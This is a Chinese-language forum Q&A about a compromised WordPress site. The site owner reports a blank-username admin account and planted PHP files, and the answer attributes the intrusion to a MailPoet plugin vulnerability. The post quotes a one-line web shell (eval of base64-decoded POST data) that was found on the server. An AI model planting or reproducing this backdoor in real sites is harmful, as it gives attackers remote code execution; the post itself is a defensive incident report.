Wordpress管理员入侵了

时间:2014-07-14 08:51:37

标签: php wordpress

我收到了一封来自wordfence插件的电子邮件,其中一位用户(空用户名)已登录管理区域。

A user with username " " who has administrator access signed in to your WordPress site.

在用户中,有一个没有数据的新用户。电子邮件,用户名等都是空的。这是第一个问题。第二个问题可能是这个问题的结果......

某些php文件已上传到/ wp-content / uploads / 2014/03文件夹,dir.php和841rewb3v4x.php

dir.php具有以下代码

<?php    eval(base64_decode($_POST['n358cfa']));?>

另一个文件编码了php代码,可在此处找到http://www.unphp.net/decode/f845fc88a23b7a59b3f5c04ed09cf7b0/

如果有人知道,该代码有什么作用?另外,我该怎么做呢? (我已经删除了用户和文件)。

谢谢!

1 个答案:

答案 0 :(得分:0)

最后,关于这个问题的一些重要信息!这是因为邮箱插件存在巨大漏洞。

您可以在此处查看更多详细信息:

http://blog.sucuri.net/2014/07/mailpoet-vulnerability-exploited-in-the-wild-breaking-thousands-of-wordpress-sites.html

http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html